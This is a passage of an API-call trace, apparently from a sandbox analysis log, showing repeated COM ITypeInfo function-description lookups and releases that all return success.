ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x20, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x21, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x22, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x23, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x24, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x25, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x26, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x27, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x28, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x29, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x30, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x31, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x32, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x33, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x34, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x35, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x36, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x37, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x38, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x39, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.311] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.311] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x40, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x41, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x42, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x43, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x44, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x45, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x46, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x47, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x48, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x49, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x50, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.312] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.312] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x51, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x52, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x53, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x54, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x55, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x56, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x57, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x58, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x59, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x60, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x61, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x62, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x63, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x64, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x65, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.313] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x66, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x67, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x68, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x69, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x70, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x71, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x72, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x73, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x74, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x75, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x76, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x77, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x78, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x79, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.314] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] 